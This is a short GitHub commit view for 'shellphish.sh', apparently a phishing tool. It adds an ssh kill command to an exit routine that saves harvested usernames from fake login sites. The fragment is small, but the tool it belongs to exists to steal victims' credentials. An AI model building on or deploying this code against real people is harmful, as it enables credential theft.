Update shellphish.sh

This commit is contained in:
The Linux Choice
2018-07-23 11:15:51 -03:00
committed by GitHub
parent ba966c7342
commit b3ccbb2e6d

View File

@@ -206,6 +206,8 @@ cat sites/$server/usernames.txt >> sites/$server/saved.usernames.txt
printf "\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m] Saved:\e[0m\e[1;77m sites/%s/saved.usernames.txt\e[0m\n" $server
killall -2 php > /dev/null 2>&1
killall -2 ngrok > /dev/null 2>&1
killall -2 ssh > /dev/null 2>&1
exit 1
}